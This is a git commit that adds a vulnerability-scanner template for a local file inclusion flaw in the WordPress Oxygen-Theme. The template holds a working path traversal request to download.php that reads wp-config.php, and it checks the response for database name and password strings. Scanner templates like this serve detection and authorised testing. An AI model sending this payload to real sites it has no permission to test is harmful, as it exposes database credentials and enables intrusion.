Create wp-oxygen-theme-lfi.yaml

patch-1
Roberto Nunes 2021-10-08 22:16:16 +09:00 committed by GitHub
parent 41f0222e03
commit d93f55304e
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 26 additions and 0 deletions

26
wp-oxygen-theme-lfi.yaml Normal file
View File

@ -0,0 +1,26 @@
id: wp-oxygen-theme-lfi
info:
name: WordPress Oxygen-Theme Themes LFI
author: 0x_Akoko
severity: high
tags: wordpress,wp-theme,lfi,wp
reference: https://cxsecurity.com/issue/WLB-2019030178
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/themes/oxygen-theme/download.php?file=../../../wp-config.php'
matchers-condition: and
matchers:
- type: word
words:
- "DB_NAME"
- "DB_PASSWORD"
part: body
condition: and
- type: status
status:
- 200